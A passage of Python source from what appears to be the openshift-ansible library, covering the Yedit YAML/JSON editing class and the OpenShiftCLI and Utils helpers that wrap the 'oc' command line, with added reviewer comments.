        elif key_indexes[-1][1] and isinstance(data, dict):
            data[key_indexes[-1][1]] = item

        # didn't add/update to an existing list, nor add/update key to a dict
        # so we must have been provided some syntax like a.b.c[<int>] = "data" for a
        # non-existent array
        else:
            raise YeditException("Error adding to object at path: {}".format(key))

        return data

    @staticmethod
    def get_entry(data, key, sep='.'):
        ''' Get an item from a dictionary with key notation a.b.c
            d = {'a': {'b': 'c'}}}
            key = a.b
            return c
        '''
        if key == '':
            pass
        elif (not (key and Yedit.valid_key(key, sep)) and
              isinstance(data, (list, dict))):
            return None

        key_indexes = Yedit.parse_key(key, sep)
        for arr_ind, dict_key in key_indexes:
            if dict_key and isinstance(data, dict):
                data = data.get(dict_key)
            elif (arr_ind and isinstance(data, list) and
                  int(arr_ind) <= len(data) - 1):
                data = data[int(arr_ind)]
            else:
                return None

        return data

    @staticmethod
    def _write(filename, contents):
        ''' Actually write the file contents to disk. This helps with mocking. '''

        tmp_filename = filename + '.yedit'

        with open(tmp_filename, 'w') as yfd:
            yfd.write(contents)

        os.rename(tmp_filename, filename)

    def write(self):
        ''' Serialize yaml_dict and write it to self.filename.

        Returns (True, yaml_dict).  Raises YeditException when no
        filename was configured.
        '''
        if not self.filename:
            raise YeditException('Please specify a filename.')

        if self.backup and self.file_exists():
            # Keep a pristine copy alongside the file before overwriting.
            shutil.copy(self.filename, self.filename + '.orig')

        # Try to set format attributes if supported
        # (only ruamel.yaml round-trip objects have `.fa`).
        try:
            self.yaml_dict.fa.set_block_style()
        except AttributeError:
            pass

        # Try to use RoundTripDumper if supported.
        # (plain pyyaml has no RoundTripDumper -> AttributeError -> safe_dump)
        try:
            Yedit._write(self.filename, yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
        except AttributeError:
            Yedit._write(self.filename, yaml.safe_dump(self.yaml_dict, default_flow_style=False))

        return (True, self.yaml_dict)

    def read(self):
        ''' read from file '''
        # check if it exists
        if self.filename is None or not self.file_exists():
            return None

        contents = None
        with open(self.filename) as yfd:
            contents = yfd.read()

        return contents

    def file_exists(self):
        ''' return whether file exists '''
        if os.path.exists(self.filename):
            return True

        return False

    def load(self, content_type='yaml'):
        ''' Parse the file (or self.content) into yaml_dict and return it.

        Returns None when there is nothing to parse; raises YeditException
        on a yaml parse error.
        '''
        contents = self.read()

        if not contents and not self.content:
            return None

        if self.content:
            # Pre-supplied content takes precedence over the file on disk:
            # a dict is used as-is, a string is parsed below.
            if isinstance(self.content, dict):
                self.yaml_dict = self.content
                return self.yaml_dict
            elif isinstance(self.content, str):
                contents = self.content

        # check if it is yaml
        try:
            if content_type == 'yaml' and contents:
                # Try to set format attributes if supported
                # (only ruamel.yaml round-trip objects have `.fa`).
                try:
                    self.yaml_dict.fa.set_block_style()
                except AttributeError:
                    pass

                # Try to use RoundTripLoader if supported.
                # (plain pyyaml's safe_load rejects the extra argument
                # only on ruamel; AttributeError selects the fallback)
                try:
                    self.yaml_dict = yaml.safe_load(contents, yaml.RoundTripLoader)
                except AttributeError:
                    self.yaml_dict = yaml.safe_load(contents)

                # Try to set format attributes if supported
                try:
                    self.yaml_dict.fa.set_block_style()
                except AttributeError:
                    pass

            elif content_type == 'json' and contents:
                self.yaml_dict = json.loads(contents)
        except yaml.YAMLError as err:
            # Error loading yaml or json
            raise YeditException('Problem with loading yaml file. {}'.format(err))

        return self.yaml_dict

    def get(self, key):
        ''' get a specified key'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
        except KeyError:
            entry = None

        return entry

    def pop(self, path, key_or_item):
        ''' remove a key, value pair from a dict or an item for a list'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if entry is None:
            return (False, self.yaml_dict)

        if isinstance(entry, dict):
            # AUDIT:maybe-no-member makes sense due to fuzzy types
            # pylint: disable=maybe-no-member
            if key_or_item in entry:
                entry.pop(key_or_item)
                return (True, self.yaml_dict)
            return (False, self.yaml_dict)

        elif isinstance(entry, list):
            # AUDIT:maybe-no-member makes sense due to fuzzy types
            # pylint: disable=maybe-no-member
            ind = None
            try:
                ind = entry.index(key_or_item)
            except ValueError:
                return (False, self.yaml_dict)

            entry.pop(ind)
            return (True, self.yaml_dict)

        return (False, self.yaml_dict)

    def delete(self, path):
        ''' remove path from a dict'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if entry is None:
            return (False, self.yaml_dict)

        result = Yedit.remove_entry(self.yaml_dict, path, self.separator)
        if not result:
            return (False, self.yaml_dict)

        return (True, self.yaml_dict)

    def exists(self, path, value):
        ''' check if value exists at path'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if isinstance(entry, list):
            if value in entry:
                return True
            return False

        elif isinstance(entry, dict):
            if isinstance(value, dict):
                rval = False
                for key, val in value.items():
                    if entry[key] != val:
                        rval = False
                        break
                else:
                    rval = True
                return rval

            return value in entry

        return entry == value

    def append(self, path, value):
        '''append value to a list'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if entry is None:
            self.put(path, [])
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        if not isinstance(entry, list):
            return (False, self.yaml_dict)

        # AUDIT:maybe-no-member makes sense due to loading data from
        # a serialized format.
        # pylint: disable=maybe-no-member
        entry.append(value)
        return (True, self.yaml_dict)

    # pylint: disable=too-many-arguments
    def update(self, path, value, index=None, curr_value=None):
        ''' put path, value into a dict '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        if isinstance(entry, dict):
            # AUDIT:maybe-no-member makes sense due to fuzzy types
            # pylint: disable=maybe-no-member
            if not isinstance(value, dict):
                raise YeditException('Cannot replace key, value entry in dict with non-dict type. ' +
                                     'value=[{}] type=[{}]'.format(value, type(value)))

            entry.update(value)
            return (True, self.yaml_dict)

        elif isinstance(entry, list):
            # AUDIT:maybe-no-member makes sense due to fuzzy types
            # pylint: disable=maybe-no-member
            ind = None
            if curr_value:
                try:
                    ind = entry.index(curr_value)
                except ValueError:
                    return (False, self.yaml_dict)

            elif index is not None:
                ind = index

            if ind is not None and entry[ind] != value:
                entry[ind] = value
                return (True, self.yaml_dict)

            # see if it exists in the list
            try:
                ind = entry.index(value)
            except ValueError:
                # doesn't exist, append it
                entry.append(value)
                return (True, self.yaml_dict)

            # already exists, return
            if ind is not None:
                return (False, self.yaml_dict)
        return (False, self.yaml_dict)

    def put(self, path, value):
        ''' Set `value` at `path`, editing a working copy of the document
            so a failed edit leaves yaml_dict untouched.
            Returns (changed, yaml_dict).
        '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError:
            entry = None

        # No-op when the value is already in place.
        if entry == value:
            return (False, self.yaml_dict)

        # deepcopy didn't work
        # Try to use ruamel.yaml and fallback to pyyaml
        # (round_trip_dump only exists on ruamel -> AttributeError selects
        # the plain deepcopy path)
        try:
            tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
                                                      default_flow_style=False),
                                 yaml.RoundTripLoader)
        except AttributeError:
            tmp_copy = copy.deepcopy(self.yaml_dict)

        # set the format attributes if available
        try:
            tmp_copy.fa.set_block_style()
        except AttributeError:
            pass

        result = Yedit.add_entry(tmp_copy, path, value, self.separator)
        if result is None:
            return (False, self.yaml_dict)

        # When path equals "" it is a special case.
        # "" refers to the root of the document
        # Only update the root path (entire document) when its a list or dict
        if path == '':
            if isinstance(result, list) or isinstance(result, dict):
                self.yaml_dict = result
                return (True, self.yaml_dict)

            return (False, self.yaml_dict)

        self.yaml_dict = tmp_copy

        return (True, self.yaml_dict)

    def create(self, path, value):
        ''' Seed the document with `value` at `path`, but only when the
            backing file does not already exist.
            Returns (changed, yaml_dict).
        '''
        if not self.file_exists():
            # deepcopy didn't work
            # Try to use ruamel.yaml and fallback to pyyaml
            # (round_trip_dump only exists on ruamel -> AttributeError
            # selects the plain deepcopy path)
            try:
                tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
                                                          default_flow_style=False),
                                     yaml.RoundTripLoader)
            except AttributeError:
                tmp_copy = copy.deepcopy(self.yaml_dict)

            # set the format attributes if available
            try:
                tmp_copy.fa.set_block_style()
            except AttributeError:
                pass

            result = Yedit.add_entry(tmp_copy, path, value, self.separator)
            if result is not None:
                self.yaml_dict = tmp_copy
                return (True, self.yaml_dict)

        return (False, self.yaml_dict)

    @staticmethod
    def get_curr_value(invalue, val_type):
        '''return the current value'''
        if invalue is None:
            return None

        curr_value = invalue
        if val_type == 'yaml':
            curr_value = yaml.load(invalue)
        elif val_type == 'json':
            curr_value = json.loads(invalue)

        return curr_value

    @staticmethod
    def parse_value(inc_value, vtype=''):
        '''determine value type passed'''
        true_bools = ['y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE',
                      'on', 'On', 'ON', ]
        false_bools = ['n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE',
                       'off', 'Off', 'OFF']

        # It came in as a string but you didn't specify value_type as string
        # we will convert to bool if it matches any of the above cases
        if isinstance(inc_value, str) and 'bool' in vtype:
            if inc_value not in true_bools and inc_value not in false_bools:
                raise YeditException('Not a boolean type. str=[{}] vtype=[{}]'.format(inc_value, vtype))
        elif isinstance(inc_value, bool) and 'str' in vtype:
            inc_value = str(inc_value)

        # There is a special case where '' will turn into None after yaml loading it so skip
        if isinstance(inc_value, str) and inc_value == '':
            pass
        # If vtype is not str then go ahead and attempt to yaml load it.
        elif isinstance(inc_value, str) and 'str' not in vtype:
            try:
                inc_value = yaml.safe_load(inc_value)
            except Exception:
                raise YeditException('Could not determine type of incoming value. ' +
                                     'value=[{}] vtype=[{}]'.format(type(inc_value), vtype))

        return inc_value

    @staticmethod
    def process_edits(edits, yamlfile):
        '''run through a list of edits and process them one-by-one'''
        results = []
        for edit in edits:
            value = Yedit.parse_value(edit['value'], edit.get('value_type', ''))
            action = edit.get('action')

            if action == 'update':
                # pylint: disable=line-too-long
                curr_value = Yedit.get_curr_value(
                    Yedit.parse_value(edit.get('curr_value')),
                    edit.get('curr_value_format'))

                rval = yamlfile.update(edit['key'], value, edit.get('index'), curr_value)
            elif action == 'append':
                rval = yamlfile.append(edit['key'], value)
            else:
                rval = yamlfile.put(edit['key'], value)

            # rval is a (changed, document) tuple; record only real changes
            if rval[0]:
                results.append({'key': edit['key'], 'edit': rval[1]})

        return {'changed': len(results) > 0, 'results': results}

    # pylint: disable=too-many-return-statements,too-many-branches
    @staticmethod
    def run_ansible(params):
        '''perform the idempotent crud operations

           params: the ansible module parameter dict (src, backup, separator,
           state, content, content_type, key, value, value_type, update,
           append, index, curr_value, curr_value_format, edits).

           Returns an ansible-style result dict; on error the dict carries
           'failed': True and a 'msg' entry.
        '''
        yamlfile = Yedit(filename=params['src'],
                         backup=params['backup'],
                         separator=params['separator'])

        state = params['state']

        if params['src']:
            rval = yamlfile.load()

            if yamlfile.yaml_dict is None and state != 'present':
                # fixed message grammar ("that it is has" -> "that it has")
                return {'failed': True,
                        'msg': 'Error opening file [{}].  Verify that the '.format(params['src']) +
                               'file exists, that it has correct permissions, and is valid yaml.'}

        if state == 'list':
            if params['content']:
                content = Yedit.parse_value(params['content'], params['content_type'])
                yamlfile.yaml_dict = content

            if params['key']:
                rval = yamlfile.get(params['key']) or {}
            elif not params['src']:
                # Without a key and without a source file, rval was never
                # assigned and this used to raise NameError; report the
                # in-memory document instead.
                rval = yamlfile.yaml_dict

            return {'changed': False, 'result': rval, 'state': state}

        elif state == 'absent':
            if params['content']:
                content = Yedit.parse_value(params['content'], params['content_type'])
                yamlfile.yaml_dict = content

            if params['update']:
                rval = yamlfile.pop(params['key'], params['value'])
            else:
                rval = yamlfile.delete(params['key'])

            if rval[0] and params['src']:
                yamlfile.write()

            return {'changed': rval[0], 'result': rval[1], 'state': state}

        elif state == 'present':
            # check if content is different than what is in the file
            if params['content']:
                content = Yedit.parse_value(params['content'], params['content_type'])

                # We had no edits to make and the contents are the same
                if yamlfile.yaml_dict == content and \
                   params['value'] is None:
                    return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}

                yamlfile.yaml_dict = content

            # If we were passed a key, value then
            # we encapsulate it in a list and process it
            # Key, Value passed to the module : Converted to Edits list #
            edits = []
            _edit = {}
            if params['value'] is not None:
                _edit['value'] = params['value']
                _edit['value_type'] = params['value_type']
                _edit['key'] = params['key']

                if params['update']:
                    _edit['action'] = 'update'
                    _edit['curr_value'] = params['curr_value']
                    _edit['curr_value_format'] = params['curr_value_format']
                    _edit['index'] = params['index']

                elif params['append']:
                    _edit['action'] = 'append'

                edits.append(_edit)

            elif params['edits'] is not None:
                edits = params['edits']

            if edits:
                results = Yedit.process_edits(edits, yamlfile)

                # if there were changes and a src provided to us we need to write
                if results['changed'] and params['src']:
                    yamlfile.write()

                return {'changed': results['changed'], 'result': results['results'], 'state': state}

            # no edits to make
            if params['src']:
                # pylint: disable=redefined-variable-type
                rval = yamlfile.write()
                return {'changed': rval[0],
                        'result': rval[1],
                        'state': state}

            # We were passed content but no src, key or value, or edits.  Return contents in memory
            return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
        # fixed misspelled error message ('Unkown' -> 'Unknown')
        return {'failed': True, 'msg': 'Unknown state passed'}

# -*- -*- -*- End included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: lib/base.py -*- -*- -*-
# pylint: disable=too-many-lines
# noqa: E301,E302,E303,T001


class OpenShiftCLIError(Exception):
    '''Error raised by the openshiftcli wrapper classes.'''


# Extra directories searched for the oc binary beyond $PATH; ansible/sudo
# environments often drop /usr/local/bin and ~/bin from the inherited PATH.
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]


def locate_oc_binary():
    ''' Find and return oc binary file '''
    # https://github.com/openshift/openshift-ansible/issues/3410
    # oc can be in /usr/local/bin in some cases, but that may not
    # be in $PATH due to ansible/sudo
    search_dirs = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS

    # Default to the bare command name if nothing better is found.
    oc_binary = 'oc'

    try:
        # shutil.which is Python 3 only; AttributeError means Python 2,
        # where we fall back to a naive existence scan of the search dirs.
        located = shutil.which(oc_binary, path=os.pathsep.join(search_dirs))
        if located is not None:
            oc_binary = located
    except AttributeError:
        for directory in search_dirs:
            candidate = os.path.join(directory, oc_binary)
            if os.path.exists(candidate):
                oc_binary = candidate
                break

    return oc_binary


# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
    ''' Class to wrap the command line tools '''
    def __init__(self,
                 namespace,
                 kubeconfig='/etc/origin/master/admin.kubeconfig',
                 verbose=False,
                 all_namespaces=False):
        ''' Constructor for OpenshiftCLI

            namespace: default namespace passed to oc via -n
            kubeconfig: path to the kubeconfig; a private temporary copy is
                used so concurrent runs cannot clobber each other
            verbose: echo commands and their output to stdout
            all_namespaces: pass --all-namespaces instead of -n
        '''
        self.namespace = namespace
        self.verbose = verbose
        # private copy of the kubeconfig, removed at interpreter exit
        self.kubeconfig = Utils.create_tmpfile_copy(kubeconfig)
        self.all_namespaces = all_namespaces
        self.oc_binary = locate_oc_binary()

    # Pylint allows only 5 arguments to be passed.
    # pylint: disable=too-many-arguments
    def _replace_content(self, resource, rname, content, force=False, sep='.'):
        ''' replace the current object with the content

            resource: the oc resource type (e.g. 'dc', 'svc')
            rname: the resource name
            content: dict of yedit path -> value to apply on top of the
                currently deployed object
            force: pass --force to oc replace
            sep: yedit path separator used in the content keys
        '''
        res = self._get(resource, rname)
        if not res['results']:
            return res

        fname = Utils.create_tmpfile(rname + '-')

        yed = Yedit(fname, res['results'][0], separator=sep)
        changes = []
        for key, value in content.items():
            changes.append(yed.put(key, value))

        # only call oc replace when at least one key actually changed
        if any([change[0] for change in changes]):
            yed.write()

            atexit.register(Utils.cleanup, [fname])

            return self._replace(fname, force)

        return {'returncode': 0, 'updated': False}

    def _replace(self, fname, force=False):
        '''replace the current object with oc replace'''
        # We are removing the 'resourceVersion' to handle
        # a race condition when modifying oc objects
        yed = Yedit(fname)
        results = yed.delete('metadata.resourceVersion')
        if results[0]:
            yed.write()

        cmd = ['replace', '-f', fname]
        if force:
            cmd.append('--force')
        return self.openshift_cmd(cmd)

    def _create_from_content(self, rname, content):
        '''create a temporary file and then call oc create on it'''
        fname = Utils.create_tmpfile(rname + '-')
        yed = Yedit(fname, content=content)
        yed.write()

        atexit.register(Utils.cleanup, [fname])

        return self._create(fname)

    def _create(self, fname):
        '''call oc create on a filename'''
        return self.openshift_cmd(['create', '-f', fname])

    def _delete(self, resource, name=None, selector=None):
        '''call oc delete on a resource

            exactly one of name or selector must be provided; selector wins
            when both are given
        '''
        cmd = ['delete', resource]
        if selector is not None:
            cmd.append('--selector={}'.format(selector))
        elif name is not None:
            cmd.append(name)
        else:
            raise OpenShiftCLIError('Either name or selector is required when calling delete.')

        return self.openshift_cmd(cmd)

    def _process(self, template_name, create=False, params=None, template_data=None):  # noqa: E501
        '''process a template

           template_name: the name of the template to process
           create: whether to send to oc create after processing
           params: the parameters for the template
           template_data: the incoming template's data; instead of a file
        '''
        cmd = ['process']
        if template_data:
            # '-f -' makes oc read the template from stdin
            cmd.extend(['-f', '-'])
        else:
            cmd.append(template_name)
        if params:
            param_str = ["{}={}".format(key, str(value).replace("'", r'"')) for key, value in params.items()]
            # NOTE(review): '-v' is the legacy oc process parameter flag --
            # confirm against the oc versions this module targets
            cmd.append('-v')
            cmd.extend(param_str)

        results = self.openshift_cmd(cmd, output=True, input_data=template_data)

        if results['returncode'] != 0 or not create:
            return results

        fname = Utils.create_tmpfile(template_name + '-')
        yed = Yedit(fname, results['results'])
        yed.write()

        atexit.register(Utils.cleanup, [fname])

        return self.openshift_cmd(['create', '-f', fname])

    def _get(self, resource, name=None, selector=None):
        '''return a resource by name '''
        cmd = ['get', resource]
        if selector is not None:
            cmd.append('--selector={}'.format(selector))
        elif name is not None:
            cmd.append(name)

        cmd.extend(['-o', 'json'])

        rval = self.openshift_cmd(cmd, output=True)

        # Ensure results are returned in an array
        if 'items' in rval:
            rval['results'] = rval['items']
        elif not isinstance(rval['results'], list):
            rval['results'] = [rval['results']]

        return rval

    def _schedulable(self, node=None, selector=None, schedulable=True):
        ''' perform oadm manage-node schedulable '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector={}'.format(selector))

        cmd.append('--schedulable={}'.format(schedulable))

        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')  # noqa: E501

    def _list_pods(self, node=None, selector=None, pod_selector=None):
        ''' perform oadm list pods

            node: the node in which to list pods
            selector: the label selector filter if provided
            pod_selector: the pod selector filter if provided
        '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector={}'.format(selector))

        if pod_selector:
            cmd.append('--pod-selector={}'.format(pod_selector))

        cmd.extend(['--list-pods', '-o', 'json'])

        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')

    # pylint: disable=too-many-arguments
    def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
        ''' perform oadm manage-node evacuate '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector={}'.format(selector))

        if dry_run:
            cmd.append('--dry-run')

        if pod_selector:
            cmd.append('--pod-selector={}'.format(pod_selector))

        if grace_period:
            cmd.append('--grace-period={}'.format(int(grace_period)))

        if force:
            cmd.append('--force')

        cmd.append('--evacuate')

        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')

    def _version(self):
        ''' return the openshift version'''
        return self.openshift_cmd(['version'], output=True, output_type='raw')

    def _import_image(self, url=None, name=None, tag=None):
        ''' perform image import '''
        cmd = ['import-image']

        image = '{0}'.format(name)
        if tag:
            image += ':{0}'.format(tag)

        cmd.append(image)

        if url:
            cmd.append('--from={0}/{1}'.format(url, image))

        cmd.append('-n{0}'.format(self.namespace))

        cmd.append('--confirm')
        return self.openshift_cmd(cmd)

    def _run(self, cmds, input_data):
        ''' Actually executes the command. This makes mocking easier.

            Returns (returncode, stdout, stderr) with the streams decoded
            as utf-8 text.
        '''
        curr_env = os.environ.copy()
        curr_env.update({'KUBECONFIG': self.kubeconfig})
        proc = subprocess.Popen(cmds,
                                stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                env=curr_env)

        stdout, stderr = proc.communicate(input_data)

        return proc.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')

    # pylint: disable=too-many-arguments,too-many-branches
    def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
        '''Base command for oc

           cmd: list of arguments appended after the oc binary (and 'adm')
           oadm: insert the 'adm' subcommand
           output: capture and parse stdout into rval['results']
           output_type: 'json' to json-decode stdout, 'raw' for plain text
           input_data: bytes piped to the subprocess stdin

           Returns a dict with at least returncode/results/cmd keys.
        '''
        cmds = [self.oc_binary]

        if oadm:
            cmds.append('adm')

        cmds.extend(cmd)

        if self.all_namespaces:
            cmds.extend(['--all-namespaces'])
        # 'none'/'empty' are sentinel namespace values meaning "no -n flag";
        # fixed the misspelled 'emtpy' sentinel here
        elif self.namespace is not None and self.namespace.lower() not in ['none', 'empty']:  # E501
            cmds.extend(['-n', self.namespace])

        rval = {}
        results = ''
        err = None

        if self.verbose:
            print(' '.join(cmds))

        try:
            returncode, stdout, stderr = self._run(cmds, input_data)
        except OSError as ex:
            returncode, stdout, stderr = 1, '', 'Failed to execute {}: {}'.format(subprocess.list2cmdline(cmds), ex)

        rval = {"returncode": returncode,
                "results": results,
                "cmd": ' '.join(cmds)}

        if returncode == 0:
            if output:
                if output_type == 'json':
                    try:
                        rval['results'] = json.loads(stdout)
                    except ValueError as verr:
                        # substring match on the exception text; the previous
                        # 'in verr.args' compared whole tuple elements and
                        # could never match a longer decode-error message
                        if "No JSON object could be decoded" in str(verr):
                            err = verr.args
                elif output_type == 'raw':
                    rval['results'] = stdout

            if self.verbose:
                print("STDOUT: {0}".format(stdout))
                print("STDERR: {0}".format(stderr))

            if err:
                rval.update({"err": err,
                             "stderr": stderr,
                             "stdout": stdout,
                             "cmd": cmds})

        else:
            rval.update({"stderr": stderr,
                         "stdout": stdout,
                         "results": {}})

        return rval


class Utils(object):  # pragma: no cover
    ''' utilities for openshiftcli modules '''

    @staticmethod
    def _write(filename, contents):
        ''' Actually write the file contents to disk. This helps with mocking. '''

        with open(filename, 'w') as sfd:
            sfd.write(contents)

    @staticmethod
    def create_tmp_file_from_contents(rname, data, ftype='yaml'):
        ''' create a file in tmp with name and contents

            rname: prefix for the temp file name
            data: object to serialize (or raw text when ftype is unknown)
            ftype: 'yaml', 'json', or anything else for raw pass-through
            Returns the path of the created file; cleanup runs at exit.
        '''

        tmp = Utils.create_tmpfile(prefix=rname)

        if ftype == 'yaml':
            # AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
            # pylint: disable=no-member
            # ruamel.yaml exposes RoundTripDumper; plain PyYAML does not,
            # so fall back to safe_dump in that case
            if hasattr(yaml, 'RoundTripDumper'):
                Utils._write(tmp, yaml.dump(data, Dumper=yaml.RoundTripDumper))
            else:
                Utils._write(tmp, yaml.safe_dump(data, default_flow_style=False))

        elif ftype == 'json':
            Utils._write(tmp, json.dumps(data))
        else:
            # unknown type: assume data is already serialized text
            Utils._write(tmp, data)

        # Register cleanup when module is done
        atexit.register(Utils.cleanup, [tmp])
        return tmp

    @staticmethod
    def create_tmpfile_copy(inc_file):
        '''create a temporary copy of a file'''
        tmpfile = Utils.create_tmpfile('lib_openshift-')
        # NOTE(review): the open() handle is never closed explicitly and
        # relies on garbage collection
        Utils._write(tmpfile, open(inc_file).read())

        # Cleanup the tmpfile
        atexit.register(Utils.cleanup, [tmpfile])

        return tmpfile

    @staticmethod
    def create_tmpfile(prefix='tmp'):
        ''' Generates and returns a temporary file name '''

        # delete=False: only the name is wanted; the file persists for the
        # caller to write into
        with tempfile.NamedTemporaryFile(prefix=prefix, delete=False) as tmp:
            return tmp.name

    @staticmethod
    def create_tmp_files_from_contents(content, content_type=None):
        '''Turn an array of dict: filename, content into a files array'''
        # accept a single dict as well as a list of dicts
        if not isinstance(content, list):
            content = [content]
        files = []
        for item in content:
            path = Utils.create_tmp_file_from_contents(item['path'] + '-',
                                                       item['data'],
                                                       ftype=content_type)
            files.append({'name': os.path.basename(item['path']),
                          'path': path})
        return files

    @staticmethod
    def cleanup(files):
        '''Clean up on exit '''
        for sfile in files:
            if os.path.exists(sfile):
                if os.path.isdir(sfile):
                    shutil.rmtree(sfile)
                elif os.path.isfile(sfile):
                    os.remove(sfile)

    @staticmethod
    def exists(results, _name):
        ''' Check to see if the results include the name '''
        if not results:
            return False

        if Utils.find_result(results, _name):
            return True

        return False

    @staticmethod
    def find_result(results, _name):
        ''' Find the specified result by name

            Returns the first result whose metadata.name matches, else None.
        '''
        rval = None
        for result in results:
            if 'metadata' in result and result['metadata']['name'] == _name:
                rval = result
                break

        return rval

    @staticmethod
    def get_resource_file(sfile, sfile_type='yaml'):
        ''' return the service file '''
        contents = None
        with open(sfile) as sfd:
            contents = sfd.read()

        if sfile_type == 'yaml':
            # AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
            # pylint: disable=no-member
            if hasattr(yaml, 'RoundTripLoader'):
                contents = yaml.load(contents, yaml.RoundTripLoader)
            else:
                contents = yaml.safe_load(contents)
        elif sfile_type == 'json':
            contents = json.loads(contents)

        return contents

    @staticmethod
    def filter_versions(stdout):
        ''' filter the oc version output

            Maps tool name ('oc', 'openshift', 'kubernetes') to the last
            whitespace-separated token of its line in `oc version` output.
        '''

        version_dict = {}
        version_search = ['oc', 'openshift', 'kubernetes']

        for line in stdout.strip().split('\n'):
            for term in version_search:
                if not line:
                    continue
                if line.startswith(term):
                    version_dict[term] = line.split()[-1]

        # horrible hack to get openshift version in Openshift 3.2
        #  By default "oc version in 3.2 does not return an "openshift" version
        # NOTE(review): raises KeyError if the "oc" line is also missing
        if "openshift" not in version_dict:
            version_dict["openshift"] = version_dict["oc"]

        return version_dict

    @staticmethod
    def add_custom_versions(versions):
        ''' create custom versions strings

            For each 'vX.Y.Z...' version, adds '<tech>_numeric' (digits
            before any '+') and '<tech>_short' (a fixed 3-char slice).
        '''

        versions_dict = {}

        for tech, version in versions.items():
            # clean up "-" from version
            if "-" in version:
                version = version.split("-")[0]

            if version.startswith('v'):
                versions_dict[tech + '_numeric'] = version[1:].split('+')[0]
                # "v3.3.0.33" is what we have, we want "3.3"
                # NOTE(review): the [1:4] slice assumes single-digit
                # major/minor components
                versions_dict[tech + '_short'] = version[1:4]

        return versions_dict

    @staticmethod
    def openshift_installed():
        ''' check if openshift is installed '''
        # NOTE(review): yum bindings are Python 2 only; this raises
        # ImportError on Python 3 / dnf-based hosts -- confirm intended scope
        import yum

        yum_base = yum.YumBase()
        if yum_base.rpmdb.searchNevra(name='atomic-openshift'):
            return True

        return False

    # Disabling too-many-branches.  This is a yaml dictionary comparison function
    # pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
    @staticmethod
    def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
        ''' Given a user defined definition, compare it with the results given back by our query.

            Comparison is driven by result_def's keys; 'metadata', 'status'
            and any skip_keys are ignored.  Returns True when everything
            compared matches.
        '''

        # Currently these values are autogenerated and we do not need to check them
        skip = ['metadata', 'status']
        if skip_keys:
            skip.extend(skip_keys)

        for key, value in result_def.items():
            if key in skip:
                continue

            # Both are lists
            if isinstance(value, list):
                if key not in user_def:
                    if debug:
                        print('User data does not have key [%s]' % key)
                        print('User data: %s' % user_def)
                    return False

                if not isinstance(user_def[key], list):
                    if debug:
                        print('user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key]))
                    return False

                if len(user_def[key]) != len(value):
                    if debug:
                        print("List lengths are not equal.")
                        print("key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value)))
                        print("user_def: %s" % user_def[key])
                        print("value: %s" % value)
                    return False

                for values in zip(user_def[key], value):
                    if isinstance(values[0], dict) and isinstance(values[1], dict):
                        if debug:
                            print('sending list - list')
                            print(type(values[0]))
                            print(type(values[1]))
                        result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
                        if not result:
                            # NOTE(review): this print is not gated on debug
                            print('list compare returned false')
                            return False

                    # NOTE(review): compares the whole lists, not the zipped
                    # pair -- repeated each iteration for non-dict elements
                    elif value != user_def[key]:
                        if debug:
                            print('value should be identical')
                            print(user_def[key])
                            print(value)
                        return False

            # recurse on a dictionary
            elif isinstance(value, dict):
                if key not in user_def:
                    if debug:
                        print("user_def does not have key [%s]" % key)
                    return False
                if not isinstance(user_def[key], dict):
                    if debug:
                        print("dict returned false: not instance of dict")
                    return False

                # before passing ensure keys match
                api_values = set(value.keys()) - set(skip)
                user_values = set(user_def[key].keys()) - set(skip)
                if api_values != user_values:
                    if debug:
                        print("keys are not equal in dict")
                        print(user_values)
                        print(api_values)
                    return False

                result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
                if not result:
                    if debug:
                        print("dict returned false")
                        print(result)
                    return False

            # Verify each key, value pair is the same
            else:
                if key not in user_def or value != user_def[key]:
                    if debug:
                        print("value not equal; user_def does not have key")
                        print(key)
                        print(value)
                        if key in user_def:
                            print(user_def[key])
                    return False

        if debug:
            print('returning true')
        return True

class OpenShiftCLIConfig(object):
    '''Generic Config'''
    def __init__(self, rname, namespace, kubeconfig, options):
        self.kubeconfig = kubeconfig
        self.name = rname
